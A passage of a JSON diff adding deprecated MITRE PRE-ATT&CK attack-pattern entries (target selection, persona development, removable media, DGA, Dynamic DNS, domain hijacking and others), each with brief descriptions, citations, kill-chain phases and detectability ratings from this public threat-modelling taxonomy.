"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine operational element", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1242).\n\nIf going from strategic down to tactical or vice versa, an adversary would next consider the operational element. For example, the specific company within an industry or agency within a government. 
(Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1242", + "external_id": "T1242" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1019", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).\n\nPhysical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1282", + "external_id": "T1282" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary searches publicly available sources that list physical locations that cannot be monitored by a defender or are not necessarily monitored (e.g., all IP addresses touching their public web space listing physical locations).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Most corporations now list their locations on public facing websites. Some challenge still exists to find covert or sensitive locations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1059", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b9148981-152a-4a19-95c1-962803f5c9af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine secondary level tactical element", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1244).\n\nThe secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. 
(Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1244", + "external_id": "T1244" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1021", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--91a3735f-817a-4450-8ed4-f05a0f5c3877", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine strategic target", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1241).\n\nAn adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1241", + "external_id": "T1241" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. 
Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1018", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop KITs/KIQs", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).\n\nLeadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. 
KITs are an expression of management's intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1227", + "external_id": "T1227" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1004", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop social network persona digital footprint", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).\n\nBoth newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1342", + "external_id": "T1342" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "source_name": "RobinSageInterview", + "description": "Joan Goodchild. (2010, July 8). The Robin Sage experiment: Fake profile fools security pros. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1119", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The only difference between an adversary conducting this technique and a typical user, is the adversary's intent - to target an individual for compromise.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--82bbd209-f516-45e0-9542-4ffbbc2a8717", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Discover new exploits and monitor exploit-provider forums", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1350).\n\nAn exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. 
(Citation: EquationQA)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1350", + "external_id": "T1350" + }, + { + "source_name": "EquationQA", + "description": "Kaspersky Lab. (2015, February). EQUATION GROUP: QUESTIONS AND ANSWERS. Retrieved March 9, 2017.", + "url": "https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Many public sources exist for this information.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1127", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Discover target logon/email address format", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).\n\nEmail addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. 
(Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1255", + "external_id": "T1255" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Easily determined and not intended to be protected information. Publicly collected and shared repositories of email addresses exist.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Scraping of known email addresses from the target will likely reveal the target standard for address/username format. This information is easily discoverable.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1032", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disseminate removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1379).\n\nRemovable media containing malware can be injected in to a supply chain at large or small scale. 
It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1379", + "external_id": "T1379" + }, + { + "source_name": "USBMalwareAttacks", + "description": "Sean Carroll. (2010, November 4). USB Malware Attacks On the Rise. Retrieved March 9, 2017." + }, + { + "source_name": "FPDefendNewDomain", + "description": "William J. Lynn III. (2010, September). Defending a New Domain. Retrieved March 9, 2017." + }, + { + "source_name": "ParkingLotUSB", + "description": "Emil Protalinski. (2012, July 11). Criminals push malware by 'losing' USB sticks in parking lots. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "From a technical perspective, detection of an adversary disseminating removable media is not possible as there is no technical element involved until the compromise phase. 
Most facilities generally do not perform extensive physical security patrols, which would be necessary in order to promptly identify an adversary deploying removable media to be used in an attack.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique by penetration testers to gain access to networks via end users who are innately trusting of newly found or available technology.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1156", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d2c4206a-a431-4494-834d-52944a79e9f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Distribute malicious software development tools", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1394).\n\nAn adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1394", + "external_id": "T1394" + }, + { + "source_name": "PA XcodeGhost", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved April 12, 2017." + }, + { + "source_name": "Reflections on Trusting Trust", + "description": "Ken Thompson. (1984, August). 
Reflections on Trusting Trust. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Developers could check a hash or signature of their development tools to ensure that they match expected values (e.g., Apple provides instructions of how to do so for its Xcode developer tool), but developers may not always do so.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The adversary would need to either replace the tools provided at the official download location or influence developers to download the tools from an adversary-controlled third-party download location. Desktop operating systems (e.g., Windows, macOS) are increasingly encouraging use of vendor-provided official app stores to distribute software, which utilize code signing and increase the difficulty of replacing development tools with malicious versions.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1171", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms (DGA)", + "description": "**This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).**\n\nThe use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. 
(Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1323", + "url": "https://attack.mitre.org/techniques/T1323" + }, + { + "description": "Damballa Day Before Zero Blog. (2012, March 5). Domain Generation Algorithms (DGA) in Stealthy Malware. Retrieved March 6, 2017.", + "source_name": "DamballaDGA" + }, + { + "description": "Damballa. (n.d.). DGAs in the Hands of Cyber-Criminals Examining The State Of The Art In Malware Evasion Techniques. Retrieved March 6, 2017.", + "source_name": "DambballaDGACyberCriminals" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:00.117Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": true, + "x_mitre_old_attack_id": "PRE-T1100", + "x_mitre_version": "2.0", + "x_mitre_difficulty_for_adversary_explanation": "This technique does not require a significant amount of sophistication while still being highly effective. 
It was popularized by the Conficker worms but is prevalent in crimeware such as Murofet and BankPatch.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "It is possible to detect the use of DGAs; however, defenders have largely not been successful at mitigating the domains because they are generally registered less than an hour before they are used and disposed of within 24 hours.", + "x_mitre_detectable_by_common_defenses": "Partial" + }, + { + "id": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain registration hijacking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1326).\n\nDomain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1326", + "external_id": "T1326" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. 
Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1103", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires adversary to gain access to an email account for person listed as the domain registrar/POC. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or take advantage of renewal process gaps.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Generally not easily detectable unless domain registrar provides alerting on any updates.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dumpster dive", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).\n\nDumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. 
(Citation: FriedDumpsters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1286", + "external_id": "T1286" + }, + { + "source_name": "FriedDumpsters", + "description": "Robert B. Fried. (n.d.). Dumpsters: Beware of Treasures. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Strong physical security and monitoring will detect this behavior if performed on premises.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Not difficult if waste is placed in an unsecured or minimally secured area before collection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1063", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).\n\nDynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. 
(Citation: DellMirage2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1311", + "external_id": "T1311" + }, + { + "source_name": "DellMirage2012", + "description": "DELL SECUREWORKS COUNTER THREAT UNIT THREAT INTELLIGENCE. (2012, September 18). The Mirage Campaign. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context. It is possible, however, for defenders to see if the PTR record for an address is hosted by a known DDNS provider. There is potential to assign some level of risk based on this.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Flexible and re-configurable command and control servers, along with deniable ownership and reduced cost of ownership.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1088", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).\n\nDynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. 
(Citation: FireEyeSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1333", + "external_id": "T1333" + }, + { + "source_name": "FireEyeSupplyChain", + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is relatively easy to subscribe to dynamic DNS providers or find ways to get different IP addresses from a cloud provider.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1110", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--78ae433b-289d-4c8d-b8c1-f8de0b7f9090", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Enumerate client configurations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1262).\n\nClient configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. 
